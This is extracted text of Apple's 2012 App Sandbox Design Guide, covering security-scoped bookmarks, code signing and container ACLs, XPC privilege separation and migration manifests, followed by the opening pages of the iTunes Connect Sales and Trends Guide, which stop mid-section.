entitlements are available starting in OS X v10.7.3 and are described in “Enabling Security-Scoped Bookmark and URL Access” in Entitlement Key Reference . With the appropriate entitlements, you can create a security-scoped bookmark by calling the bookmarkDataWithOptions:includingResourceValuesForKeys:relativeToURL:error: method of the NSURL class (or its Core Foundation equivalent, the CFURLCreateBookmarkData function). When you later need access to a bookmarked resource, resolve its security-scoped bookmark by calling the the URLByResolvingBookmarkData:options:relativeToURL:bookmarkDataIsStale:error:method of the NSURL class (or its Core Foundation equivalent, the CFURLCreateByResolvingBookmarkData function). In a sandboxed app, you cannot access the file-system resource that a security-scoped URL points to until you call the startAccessingSecurityScopedResource method (or its Core Foundation equivalent, the CFURLStartAccessingSecurityScopedResource function) on the URL. When you no longer need access to a resource that you obtained using security scope (typically, after you close the resource) you must call the stopAccessingSecurityScopedResource method (or its Core Foundation equivalent, the CFURLStopAccessingSecurityScopedResource function) on the resource’s URL. Calls to start and stop access are nestable on a per-process basis. This means that if your app calls the start method on a URL twice, to fully relinquish access to the referenced resource you must call the corresponding stop method twice. If you call the stop method on a URL whose referenced resource you do not have access to, nothing happens. Warning: You must balance every call to the startAccessingSecurityScopedResource method with a corresponding call to the stopAccessingSecurityScopedResource method. If you fail to relinquish your access when you no longer need a file-system resource, your app leaks kernel resources. If sufficient kernel resources are leaked, your app loses its ability to add file-system locations to its sandbox, such as via Powerbox or security-scoped bookmarks, until relaunched. App Sandbox in Depth Security-Scoped Bookmarks and Persistent Resource Access 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 23For detailed descriptions of the methods, constants, and entitlementsto use for implementing security-scoped bookmarks in your app, read NSURL Class Reference or CFURL Reference , and read “Enabling Security-Scoped Bookmark and URL Access” in Entitlement Key Reference . App Sandbox and Code Signing After you enable App Sandbox and specify other entitlements for a target in your Xcode project, you must code sign the project. Take note of the distinction between how you set entitlements and how you set a code signing identity: ● Use the Xcode target editor to set entitlements on a target-by-target basis ● Use the Xcode project build settings to set the code signing identity for a project as a whole You must perform code signing because entitlements (including the special entitlement that enables App Sandbox) are built into an app’s code signature. From another perspective, an unsigned app is not sandboxed and has only default entitlements, regardless of settings you’ve applied in the Xcode target editor. OS X enforces a tie between an app’s container and the app’s code signature. This important security feature ensures that no other sandboxed app can access your container. The mechanism works as follows: After the system creates a container for an app, each time an app with the same bundle ID launches, the system checks that the app’s code signature matches a code signature expected by the container. If the system detects a mismatch, it prevents the app from launching. OS X’s enforcement of container integrity impacts your development and distribution cycle. This is because, in the course of creating and distributing an app, the app is code signed using various signatures. Here’s how the process works: 1. Before you create a project, you obtain two code signing certificatesfrom Apple: a development certificate and a distribution certificate. (To learn how to obtain code signing certificates, read “Creating Signing Certificates” in Tools Workflow Guide for Mac .) For development and testing, you sign your app with the development code signature. 2. When the Mac App Store distributes your app, it is signed with an Apple code signature. For testing and debugging, you may want to run both versions of your app: the version you sign and the version Apple signs. But OS X sees the Apple-signed version of your app as an intruder and won’t allow it to launch: Its code signature does not match the one expected by your app’s existing container. If you try to run the Apple-signed version of your app, you get a crash report containing a statement similar to this: App Sandbox in Depth App Sandbox and Code Signing 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 24Exception Type: EXC_BAD_INSTRUCTION (SIGILL) The solution is to adjust the access control list (ACL) on your app’s container to recognize the Apple-signed version of your app. Specifically, you add the designated code requirement of the Apple-signed version of your app to the app container’s ACL. To adjust an ACL to recognize an Apple-signed version of your app 1. Open Terminal (in /Applications/Utilities). 2. Open a Finder window that contains the Apple-signed version of your app. 3. In Terminal, enter the following command: asctl container acl add -file In place of the placeholder, substitute the path to the Apple-signed version of your app. Instead of manually typing the path, you can drag the app’s Finder icon to the Terminal window. The container’s ACL now includes the designated code requirements for both versions of your app. OS X then allows you to run either version of your app. You can use this same technique to share a container between (1) a version of an app that you initially signed with a self-generated code signature, such as the one you created in “App Sandbox Quick Start” (page 8), and (2) a later version that you signed with a development code signature from Apple. You can view the list of code requirements in a container’s ACL. For example, after adding the designated code requirement for the Apple-signed version of your app, you can confirm that the container’s ACL lists two permissible code requirements. To display the list of code requirements in a container’s ACL 1. Open Terminal (in /Applications/Utilities). 2. In Terminal, enter the following command: asctl container acl list -bundle In place of the placeholder,substitute the name of your app’s container directory. (The name of your app’s container directory is typically the same as your app’s bundle identifier.) App Sandbox in Depth App Sandbox and Code Signing 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 25For more information about working with App Sandbox container access control lists and their code requirements, read the man page for the asctl (App Sandbox control) tool. External Tools, XPC Services, and Privilege Separation Some app operations are more likely to be targets of malicious exploitation. Examples are the parsing of data received over a network, and the decoding of video frames. By using XPC, you can improve the effectiveness of the damage containment offered by App Sandbox by separating such potentially dangerous activities into their own address spaces. XPC is an OS X interprocess communication technology that complements App Sandbox by enabling privilege separation. Privilege separation, in turn, is a development strategy in which you divide an app into pieces according to the system resource access that each piece needs. The component pieces that you create are called XPC services. You create an XPC service as an individual target in your Xcode project. Each service gets its own sandbox—specifically, it gets its own container and its own set of entitlements. In addition, an XPC service that you include with your app is accessible only by your app. These advantages add up to making XPC the best technology for implementing privilege separation in an OS X app. By contrast, a child process created by using the posix_spawn function, by calling fork and exec (discouraged), or by using the NSTask class simply inherits the sandbox of the process that created it. You cannot configure a child process’s entitlements. For these reasons, child processes do not provide effective privilege separation. To use XPC with App Sandbox: ● Confer minimal privileges to each XPC service, according to its needs. ● Design the data transfers between the main app and each XPC service to be secure. ● Structure your app’s bundle appropriately. The life cycle of an XPC service, and its integration with Grand Central Dispatch (GCD), is managed entirely by the system. To obtain this support, you need only to structure your app’s bundle correctly. For more on XPC, see “Creating XPC Services” in Daemons and Services Programming Guide . App Sandbox in Depth External Tools, XPC Services, and Privilege Separation 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 26There’s a common, basic workflow for designing or converting an app for App Sandbox. The specific steps to take for your particular app, however, are as unique as your app. To create a work plan for adopting App Sandbox, use the process outlined here, along with the conceptual understanding you have from the earlier chapters in this document. Six Steps for Adopting App Sandbox The workflow to convert an OS X app to work in a sandbox typically consists of the following six steps: 1. Determine whether your app is suitable for sandboxing. 2. Design a development and distribution strategy. 3. Resolve API incompatibilities. 4. Apply the App Sandbox entitlements you need. 5. Add privilege separation using XPC. 6. Implement a migration strategy. Determine Whether Your App Is Suitable for Sandboxing Most OS X apps are fully compatible with App Sandbox. If you need behavior in your app that App Sandbox does not allow, consider an alternative approach. For example, if your app depends on hard-coded paths to locationsin the user’s home directory, consider the advantages of using Cocoa and Core Foundation path-finding APIs, which use the sandbox container instead. If you choose to not sandbox your app now, or if you determine that you need a temporary exception entitlement, use Apple’s bug reporting system to let Apple know what’s not working for you. Apple considers feature requests as it develops the OS X platform. Also, if you request a temporary exception, be sure to use the Review Notes field in iTunes Connect to explain why the exception is needed. The following app behaviors are incompatible with App Sandbox: ● Use of Authorization Services 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 27 Designing for App SandboxWith App Sandbox, you cannot do work with the functions described in Authorization Services C Reference . ● Use of accessibility APIs in assistive apps With App Sandbox, you can and should enable your app for accessibility, as described in Accessibility Overview for OS X . However, you cannot sandbox an assistive app such as a screen reader, and you cannot sandbox an app that controls another app. ● Sending Apple events to arbitrary apps With App Sandbox, you can receive Apple events and respond to Apple events, but you cannotsend Apple events to arbitrary apps. By using a temporary exception entitlement, you can enable the sending of Apple eventsto a list ofspecific apps that you specify, as described in Entitlement Key Reference . ● Sending user-info dictionaries in broadcast notifications to other tasks With App Sandbox, you cannot include a user-info dictionary when posting to an NSDistributedNotificationCenter object for messaging other tasks. (You can , as usual, include a user-info dictionary when messaging other parts of your app by way of posting to an NSNotificationCenter object.) ● Loading kernel extensions Loading of kernel extensions is prohibited with App Sandbox. ● Simulation of user input in Open and Save dialogs If your app depends on programmatically manipulating Open or Save dialogs to simulate or alter user input, your app is unsuitable for sandboxing. ● Setting preferences on other apps With App Sandbox, each app maintains its preferences inside its container. Your app has no access to the preferences of other apps. ● Configuring network settings With App Sandbox, your app cannot modify the system’s network configuration (whether with the System Configuration framework, the CoreWLAN framework, or other similar APIs) because doing so requires administrator privileges. ● Terminating other apps With App Sandbox, you cannot use the NSRunningApplication class to terminate other apps. Designing for App Sandbox Determine Whether Your App Is Suitable for Sandboxing 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 28Design a Development and Distribution Strategy During development, you may have occasion to run versions of your app that are signed with different code signatures. After you’ve run your app signed using one signature, the system won’t allow a second version of your app, signed with a second signature, to launch—unless you modify the app’s container. Be sure to understand how to handle this, as described in “App Sandbox and Code Signing” (page 24), as you design your development strategy. When a customer first launches a sandboxed version of your app, the system creates a container for your app. The access control list (ACL) for the container is established at that time, and the ACL istied to the code signature of that version of your app. The implication for you is that all future versions of the app that you distribute must use the same code signature. To learn how to obtain code signing certificatesfrom Apple, read “Creating Signing Certificates” in Tools Workflow Guide for Mac . Resolve API Incompatibilities If you are using OS X APIs in ways that were not intended, or in ways that expose user data to attack, you may encounter incompatibilities with App Sandbox. This section provides some examples of app design that are incompatible with App Sandbox and suggests what you can do instead. Opening, Saving, and Tracking Documents If you are managing documents using any technology other than the NSDocument class, you should convert to using this classto benefit from its built-in App Sandbox support. The NSDocument class automatically works with Powerbox. NSDocument also provides support for keeping documents within your sandbox if the user moves them using the Finder. Remember that the inheritance path of the NSOpenPanel and NSSavePanel classes is different when your app is sandboxed. See “Open and Save Dialog Behavior with App Sandbox” (page 19). If you don’t use the NSDocument class to manage your app’s documents, you can craft your own file-system support for App Sandbox by using the NSFileCoordinator class and the NSFilePresenter protocol. Retaining Access to File System Resources If your app depends on persistent access to file system resources outside of your app’s container, you need to adopt security-scoped bookmarks as described in “Security-Scoped Bookmarks and Persistent Resource Access” (page 21). Designing for App Sandbox Design a Development and Distribution Strategy 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 29Creating a Login Item for Your App To create a login item for your sandboxed app, use the SMLoginItemSetEnabled function (declared in ServiceManagement/SMLoginItem.h) as described in “Adding Login Items Using the Service Management Framework” in Daemons and Services Programming Guide . (With App Sandbox, you cannot create a login item using functions in the LSSharedFileList.h header file. For example, you cannot use the function LSSharedFileListInsertItemURL. Nor can you manipulate the state of launch services, such as by using the function LSRegisterURL.) Accessing User Data OS X path-finding APIs, above the POSIX layer, return paths relative to the container instead of relative to the user’s home directory. If your app, before you sandbox it, accesses locations in the user’s actual home directory (~) and you are using Cocoa or Core Foundation APIs, then, after you enable sandboxing, your path-finding code automatically uses your app’s container instead. For first launch of your sandboxed app, OS X automatically migrates your app’s main preferences file. If your app uses additional support files, perform a one-time migration of those files to the container, as described in “Migrating an App to a Sandbox” (page 33). If you are using a POSIX function such as getpwuid to obtain the path to the user’s actual home directory, consider instead using a Cocoa or Core Foundation symbol such as the NSHomeDirectory function. By using Cocoa or Core Foundation, you support the App Sandbox restriction against directly accessing the user’s home directory. If your app requires access to the user’s home directory in order to function, let Apple know about your needs using the Apple bug reporting system. In addition, be sure to follow the guidance regarding entitlements provided on the iTunes Connect website. Accessing Preferences of Other Apps Because App Sandbox directs path-finding APIs to the container for your app, reading or writing to the user’s preferencestakes place within the container. Preferencesfor othersandboxed apps are inaccessible. Preferences for appsthat are notsandboxed are placed in the ~/Library/Preferences directory, which is also inaccessible to your sandboxed app. If your app requires access to another app’s preferences in order to function—for example, if it requires access to the playlists that a user has defined for iTunes—let Apple know about your needs using the Apple bug reporting system. In addition, be sure to follow the guidance regarding entitlements provided on the iTunes Connect website. Designing for App Sandbox Resolve API Incompatibilities 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 30With these provisosin mind, you can use a path-based temporary exception entitlement to gain programmatic accessto the user’s ~/Library/Preferences folder. Use a read-only entitlement to avoid opening the user’s preferences to malicious exploitation. A POSIX function, such as getpwuid, can provide the file system path you need. For details on entitlements, see Entitlement Key Reference . Apply the App Sandbox Entitlements You Need To adopt App Sandbox for a target in an Xcode project, apply the value to the com.apple.security.app-sandbox entitlement key for that target. Do this in the Xcode target editor by selecting the Enable App Sandboxing checkbox. Apply other entitlements as needed. For a complete list, refer to Entitlement Key Reference . Important: App Sandbox protects user data most effectively when you minimize the entitlements you request. Take care not to request entitlements for privileges your app does not need. Consider whether making a change in your app could eliminate the need for an entitlement. Here’s a basic workflow to use to determine which entitlements you need: 1. Run your app and exercise its features. 2. In the Console app (available in /Applications/Utilities/), look for sandboxd violations in the All Messages system log query. Each such violation indicates that your app attempted to do something not allowed by your sandbox. Here’s what a sandboxd violation looks like in Console: 3:56:16 pm sandboxd: ([4928]) AppSandboxQuickS(4928) deny network-outbound 111.30.222.15:80 3:56:16 pm sandboxd: ([4928]) AppSandboxQuickS(4928) deny system-socket Click the paperclip icon to the right of a violation message to view the backtrace that shows what led to the violation. 3. For each sandboxd violation you find, determine how to resolve the problem. In same cases, a simple change to your app,such as using your Container instead of other file system locations,solvesthe problem. In other cases, applying an App Sandbox entitlement using the Xcode target editor is the best choice. 4. Using the Xcode target editor, enable the entitlement that you think will resolve the violation. 5. Run the app and exercise its features again. Either confirm that you have resolved the sandboxd violation, or investigate further. Designing for App Sandbox Apply the App Sandbox Entitlements You Need 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 31If you choose not to sandbox your app now or to use a temporary exception entitlement, use Apple’s bug reporting system to let Apple know about the issue you are encountering. Apple considers feature requests as it develops the OS X platform. Also, be sure use the Review Notes field in iTunes Connect to explain why the exception is needed. Add Privilege Separation Using XPC When developing for App Sandbox, look at your app’s behaviors in terms of privileges and access. Consider the potential benefitsto security and robustness ofseparating high-risk operationsinto their own XPC services. When you determine that a feature should be placed into an XPC service, do so by referring to “Creating XPC Services” in Daemons and Services Programming Guide . Implement a Migration Strategy Ensure that customers who are currently using a pre-sandbox version of your app experience a painless upgrade when they install the sandboxed version. For details on how to implement a container migration manifest, read “Migrating an App to a Sandbox” (page 33). Designing for App Sandbox Add Privilege Separation Using XPC 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 32An app that is not sandboxed places its support files in locations that are inaccessible to a sandboxed version of the same app. For example, the typical locations for support files are shown here: Path Description Legacy location ~/Library/Application Support// Sandbox location ~/Library/Containers//Data/Library/Application Support// As you can see, the sandbox location for the Application Support directory is within an app’s container—thus allowing the sandboxed app unrestricted read/write access to those files. If you previously distributed your app without sandboxing and you now want to provide a sandboxed version, you must move support files into their new, sandbox-accessible locations. Note: The system automatically migrates your app’s preferences file (~/Library/Preferences/com.yourCompany.YourApp.plist) on firstlaunch of yoursandboxed app. OS X provides support-file migration, on a per-user basis, when a user first launches the sandboxed version of your app. This support depends on a special property list file you create, called a container migration manifest. A container migration manifest consists of an array of strings that identify the support files and directories you want to migrate when a user first launches the sandboxed version of your app. The file’s name must be container-migration.plist. For each file or directory you specify for migration, you have a choice of allowing the system to place the item appropriately in your container, or explicitly specifying the destination location. OS X moves—it does not copy—the files and directories you specify in a container migration manifest. That is, the files and directories migrated into your app’s container no longer exist at their original locations. In addition, container migration is a one-way process: You are responsible for providing a way to undo it, should you need to do so during development or testing. The section “Undoing a Migration for Testing” (page 36) provides a suggestion about this. 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 33 Migrating an App to a SandboxCreating a Container Migration Manifest To support migration of app support files when a user first launches the sandboxed version of your app, create a container migration manifest. To create and add a container migration manifest to an Xcode project 1. Add a property list file to the Xcode project. The Property List template is in the OS X “Resource” group in the file template dialog. Important: Be sure to name the file container-migration.plist spelled and lowercased exactly this way. 2. Add a Move property to the container migration manifest. The Move property is the lone top-level key in a container migration manifest. You add it to the empty file as follows: ● Right-click the empty editor for the new .plist file, then choose Add Row. ● In the Key column, enter Move as the name of the key. You must use this exact casing and spelling. ● In the Type column, choose Array. 3. Add a string to the Move array for the first file or folder you want to migrate. For example, suppose you want to migrate your Application Support directory (along with its contained files and subdirectories) to your container. If your directory is called App Sandbox Quick Start and is currently within the ~/Library/Application Support directory, use the following string as the value for the new property list item: ${ApplicationSupport}/App Sandbox Quick Start No trailing slash character is required, and space characters are permitted. The search-path constant in the path is equivalent to ~/Library/Application Support. This constant is described, along with other commonly used directories, in “Use Variables to Specify Support-File Directories” (page 37). Similarly, add additional strings to identify the original (before sandboxing) paths of additional files or folders you want to migrate. Migrating an App to a Sandbox Creating a Container Migration Manifest 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 34When you specify a directory to be moved, keep in mind that the move is recursive—it includes all the subdirectories and files within the directory you specify. Before you first test a migration manifest, provide a way to undo the migration, such as suggested in “Undoing a Migration for Testing” (page 36). To test a container migration manifest 1. In the Finder, open two windows as follows: ● In one window, view the contents of the ~/Library/Containers/ directory. ● In the other window, view the contents of the directory containing the support files named in the container migration manifest—that is, the files you want to migrate. 2. Build and run the Xcode project. Upon successful migration, the support files disappear from the original (nonsandbox) directory and appear in your app’s container. If you want to alter the arrangement ofsupport files during migration, use a slightly more complicated .plist structure. Specifically, for a file or directory whose migration destination you want to control, provide both a starting and an ending path. The ending path is relative to the Data directory in your container. In specifying an ending path, you can use any of the search-path constants described in “Use Variablesto Specify Support-File Directories” (page 37). If your destination path specifies a custom directory (one that isn’t part of a standard container), the system creates the directory during migration. The following task assumes that you’re using the Xcode property list editor and working with the container migration manifest you created earlier in this chapter. To control the destination of a migrated file or directory 1. In the container migration manifest, add a new item to the Move array. 2. In the Type column, choose Array. 3. Add two strings as children of the new array item. 4. In the top string of the pair, specify the origin path of the file or directory you want to migrate. 5. In the bottom string of the pair, specify the destination (sandbox) custom path for the file or directory you want to migrate. Migrating an App to a Sandbox Creating a Container Migration Manifest 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 35File migration proceeds from top-to-bottom through the container migration manifest. Take care to list items in an order that works. For example,suppose you want to move your entire Application Support directory as-is, except for one file. You want that file to go into a new directory parallel to Application Support in the container. For this approach to work, you must specify the individual file move before you specify the move of the Application Support directory—that is, specify the individual file move higher in the container migration manifest. (If Application Support were specified to be moved first, the individual file would no longer be at its original location at the time the migration process attempted to move it to its new, custom location in the container.) Undoing a Migration for Testing When testing migration of support files, you may find it necessary to perform migration more than once. To support this, you need a way to restore your starting directory structures—that is, the structures as they exist prior to migration. One way to do this is to make a copy of the directories to migrate, before you perform a first migration. Save this copy in a location unaffected by the migration manifest. The following task assumes you have created this sort of backup copy. To manually undo a container migration for testing purposes 1. Manually copy the files and directories—those specified in the manifest—from your backup copy to their original (premigration) locations. 2. Delete your app’s container. The next time you launch the app, the system recreates the container and migrates the support files according to the current version of the container migration manifest. An Example Container Migration Manifest Listing 4-1 shows an example manifest as viewed in a text editor. Listing 4-1 An example container migration manifest Migrating an App to a Sandbox Undoing a Migration for Testing 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 36 Move ${Library}/MyApp/MyConfiguration.plist ${Library}/MyApp/MyDataStore.xml ${ApplicationSupport}/MyApp/MyDataStore.xml This manifest specifies the migration of two items from the user’s Library directory to the app’s container. For the first item, MyConfiguration.plist, only the origin path is specified, leaving it to the migration process to place the file appropriately. For the second item, MyDataStore.xml, both an origin and a custom destination path are specified. The ${Library} and ${ApplicationSupport} portions of the paths are variables you can use as a convenience. For a list of variables you can use in a container migration manifest, see “Use Variables to Specify Support-File Directories” (page 37). Use Variables to Specify Support-File Directories When you specify a path in a container migration manifest, you can use certain variables that correspond to commonly used support file directories. These variables work in origin and destination paths, but the path that a variable resolves to depends on the context. Refer to Table 4-1. Table 4-1 How system directory variables resolve depending on context Context Variable resolves to Origin path Home-relative path (relative to the ~ directory) Destination path Container-relative path (relative to the Data directory in the container) Migrating an App to a Sandbox Use Variables to Specify Support-File Directories 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 37The variables you can use for specifying support-file directories are described in Table 4-2 (page 38). For an example of how to use these variables, see Listing 4-1 (page 36). You can also use a special variable that resolves to your app’s bundle identifier, allowing you to conveniently incorporate it into an origin or destination path. This variable is ${BundleId}. Table 4-2 Variables for support-file directories Variable Directory The directory containing application support files. Corresponds to the NSApplicationSupportDirectory search-path constant. ${ApplicationSupport} The directory containing the user’s autosaved documents. Corresponds to the NSAutosavedInformationDirectory search-path constant. ${AutosavedInformation} The directory containing discardable cache files. Corresponds to the NSCachesDirectory search-path constant. ${Caches} Each variable correspondsto the directory containing the user’s documents. Corresponds to the NSDocumentDirectory search-path constant. ${Document} ${Documents} The current user’s home directory. Corresponds to the directory returned by the NSHomeDirectory function. When in a destination path in a manifest, resolves to the Container directory. ${Home} The directory containing application-related support and configuration files. Corresponds to the NSLibraryDirectory search-path constant. ${Library} Migrating an App to a Sandbox Use Variables to Specify Support-File Directories 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 38This table describes the changes to App Sandbox Design Guide . Date Notes 2012-09-19 Clarified information about launching external tools. 2012-07-23 Added an explanation of app group containers. Improved the explanation of security-scoped bookmarks in “Security-Scoped Bookmarks and Persistent Resource Access” (page 21); updated that section for OS X v10.7.4. 2012-05-14 Added a brief section in the “Designing for App Sandbox” chapter: “Retaining Access to File System Resources” (page 29). Improved the discussion in “Opening, Saving, and Tracking Documents” (page 29), adding information about using file coordinators. Corrected the information in “Creating a Login Item for Your App” (page 30). Improved explanation ofsecurity-scoped bookmarksin “Security-Scoped Bookmarks and Persistent Resource Access” (page 21). 2012-03-14 Clarified the explanation of the container directory in “The App Sandbox Container Directory” (page 16) Updated for OS X v10.7.3, including an explanation of how to use security-scoped bookmarks. 2012-02-16 Added a section explaining how to provide persistent accessto file-system resources, “Security-Scoped Bookmarks and Persistent Resource Access” (page 21). 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 39 Document Revision HistoryDate Notes Expanded the discussion in “Powerbox and File System Access Outside of Your Container” (page 17) to better explain how user actions expand your app’s file system access. Added a section detailing the changes in behavior of Open and Save dialogs, “Open and Save Dialog Behavior with App Sandbox” (page 19). New document that explains Apple's security technology for damage containment, and how to use it. 2011-09-27 Portions of this document were previously published in Code Signing and Application Sandboxing Guide . Document Revision History 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 40Apple Inc. © 2012 Apple Inc. All rights reserved. No part of this publication may be reproduced, stored in a retrievalsystem, or transmitted, in any form or by any means, mechanical, electronic, photocopying, recording, or otherwise, without prior written permission of Apple Inc., with the following exceptions: Any person is hereby authorized to store documentation on a single computer for personal use only and to print copies of documentation for personal use provided that the documentation contains Apple’s copyright notice. No licenses, express or implied, are granted with respect to any of the technology described in this document. Apple retains all intellectual property rights associated with the technology described in this document. This document is intended to assist application developers to develop applications only for Apple-labeled computers. Apple Inc. 1 Infinite Loop Cupertino, CA 95014 408-996-1010 Apple, the Apple logo, Cocoa, Finder, iTunes, Keychain, Mac, OS X, Sand, and Xcode are trademarks of Apple Inc., registered in the U.S. and other countries. QuickStart is a trademark of Apple Inc. iCloud is a service mark of Apple Inc., registered in the U.S. and other countries. App Store and Mac App Store are service marks of Apple Inc. iOS is a trademark or registered trademark of Cisco in the U.S. and other countries and is used under license. Even though Apple has reviewed this document, APPLE MAKES NO WARRANTY OR REPRESENTATION, EITHER EXPRESS OR IMPLIED, WITH RESPECT TO THIS DOCUMENT, ITS QUALITY, ACCURACY, MERCHANTABILITY, OR FITNESS FOR A PARTICULAR PURPOSE.ASARESULT, THISDOCUMENT IS PROVIDED “AS IS,” AND YOU, THE READER, ARE ASSUMING THE ENTIRE RISK AS TO ITS QUALITY AND ACCURACY. IN NO EVENT WILL APPLE BE LIABLE FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL,OR CONSEQUENTIAL DAMAGES RESULTING FROM ANY DEFECT OR INACCURACY IN THIS DOCUMENT, even if advised of the possibility of such damages. THE WARRANTY AND REMEDIES SET FORTH ABOVE ARE EXCLUSIVE AND IN LIEU OF ALL OTHERS, ORAL OR WRITTEN, EXPRESS OR IMPLIED. No Apple dealer, agent, or employee is authorized to make any modification, extension, or addition to this warranty. Some states do not allow the exclusion or limitation of implied warranties or liability for incidental or consequential damages, so the above limitation or exclusion may not apply to you. This warranty gives you specific legal rights, and you may also have other rights which vary from state to state. iTunes Connect Sales and Trends Guide App Store  Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 1Apple Inc. © 2012 Apple Inc. All rights reserved. No part of this publication may be reproduced, stored in a retrieval system, or transmitted, in any form or by any means, mechanical, electronic, photocopying, recording, or otherwise, without prior written permission of Apple Inc., with the following exceptions: Any person is hereby authorized to store documentation on a single computer for personal use only and to print copies of documentation for personal use provided that the documentation contains Apple’s copyright notice. The Apple logo is a trademark of Apple Inc. Use of the “keyboard” Apple logo (Option-Shift-K) for commercial purposes without the prior written consent of Apple may constitute trademark infringement and unfair competition in violation of federal and state laws. No licenses, express or implied, are granted with respect to any of the technology described in this document. Apple retains all intellectual property rights associated with the technology described in this document. This document is intended to assist partners in understanding the Sales and Trends module of iTunes Connect. Every effort has been made to ensure that the information in this document is accurate. Apple is not responsible for typographical errors. Apple Inc. 1 Infinite Loop Cupertino, CA 95014 408-996-1010 Even though Apple has reviewed this document, APPLE MAKES NO WARRANTY OR REPRESENTATION, EITHER EXPRESS OR IMPLIED, WITH RESPECT TO THIS DOCUMENT, ITS QUALITY, ACCURACY, MERCHANTABILITY, OR FITNESS FOR A PARTICULAR PURPOSE. AS A RESULT, THIS DOCUMENT IS PROVIDED “AS IS,” AND YOU, THE READER, ARE ASSUMING THE ENTIRE RISK AS TO ITS QUALITY AND ACCURACY. IN NO EVENT WILL APPLE BE LIABLE FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES RESULTING FROM ANY DEFECT OR INACCURACY IN THIS DOCUMENT, even if advised of the possibility of such damages THE WARRANTY AND REMEDIES SET FORTH ABOVE ARE EXCLUSIVE AND IN LIEU OF ALL OTHERS, ORAL OR WRITTEN, EXPRESS OR IMPLIED. No Apple dealer, agent, or employee is authorized to make any modification, extension, or addition to this warranty. Some states do not allow the exclusion or limitation of implied warranties or liability for incidental or consequential damages, so the above limitation or exclusion may not apply to you. This warranty gives you specific legal rights, and you may also have other rights which vary from state to state. Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 2Contents 1. Getting Started 4 2. Navigating and Viewing Your Sales and Trends Data 5 2.1. Dashboard View 6 2.2. Sales View 11 3. Downloading, Reading and Understanding Sales and Trends Data 13 3.1. Downloading Reports 13 3.2. Auto-Ingest Tool 14 3.3. Reading Reports 16 3.4. Understanding Units 18 4. Contact Us 19 Appendix A - Sales Report Field Definitions 20 Appendix B - Opt-In Report Field Definitions 21 Appendix C - Apple Fiscal Calendar 22 Appendix D - Definition of Day and Week 23 Appendix E – Product Type Identifiers 24 Appendix F – Country Codes 25 Appendix G – Promotional Codes 26 Appendix H – Currency Codes 27 Appendix I - Subscription and Period Field Values 28 Appendix J - FAQs 29 Appendix K - Sample Sales Report 30 Appendix L – Other Uses 32 Appendix M - Newsstand Report Field Definitions 33 Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 31. Getting Started iTunes Connect can be accessed at http://itunesconnect.apple.com. Once you login, you will be presented with the Welcome page below, which contains notifications at the top and module links to help you navigate through iTunes Connect. The Welcome page you will see is based on the modules applicable to you and may be different from what is shown below. This guide is primarily intended to cover the Sales and Trends module. The initial user who entered into the program license agreement has the “Admin” role, which provides access to all modules, including the ability to add other “Admin” users (using the Manage Users module). The “Admin” users associated with your account are expected to manage (add, modify, and delete) your users based on your needs. Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 42. Navigating and Viewing Your Sales and Trends Data The iTunes Connect Sales and Trends module allows you to interact with your sales data in various ways: ■ A summary that provides total units, percent differences, graphs, top selling content and largest market information (Dashboard view). ■ Previews that provide the top 50 transactions of sales aggregated at the title level in descending sorted order (Sales view). ■ Download full transaction reports for import and further analysis (Sales view). When you are ready to access the Sales and Trends module, click on the following link located on the Welcome page: Upon selecting the Sales and Trends module, you will be taken to the Dashboard view. Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 52.1. Dashboard View The Dashboard will load and display the most recent daily data available. The following identifies the various components of the dashboard. The “Selection” controls located above the graph allow you to change the information displayed. Vendor Selection The Vendor Selection display lists the legal entity name for the Sales and Trends that you are viewing. Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 6View Selection The View Selection allows you to switch between different views. In addition to the Dashboard view, you can toggle to the Sales view (the Sales view is covered in section 2.2). Period Selection You can choose the type (daily or weekly), as well as the period of interest. The date menu will display all periods available up to the last 13 weeks or 14 days. Category Selection You can choose the specific category you wish to view in the Dashboard if you sell more than one type of content (i.e. iOS and MacOS). Apple Inc. iTunes Connect Sales and Trends Guide, App Store Version 5.3  iTunes Connect Sales and Trends Guide, App Store (Version 5.3, August 2012) 7Type Selection You can choose the specific type of content within a category to view in the Dashboard’s graph, Top Products and Top Markets. The available types are the same for both the iOS and MacOS category. Refer to Appendix E for the complete product breakdown by product type. Graph Selection You can choose between a line graph and bar graph by clicking on the graph buttons located on the right top corner of the graph. Graph The data displayed in the graph is based on the period (specific day or week), category and type selected. When you hover over a specific day or week in the graph (bar or line), the date, number of units and type will be displayed. The following displays the graph for the period of August 30, 2010 and the Free Apps category while mousing over the August 30, 2010 bar. When viewing daily reports, the graph will also display the percentage change from the same day in the prior period. In the graph above you see the percentage change of free apps sold on 8/30 (Monday) to those sold on 8/24 (Monday of prior week) based on units. Apple Inc. iTunes Connect Sales and Trends Guide, 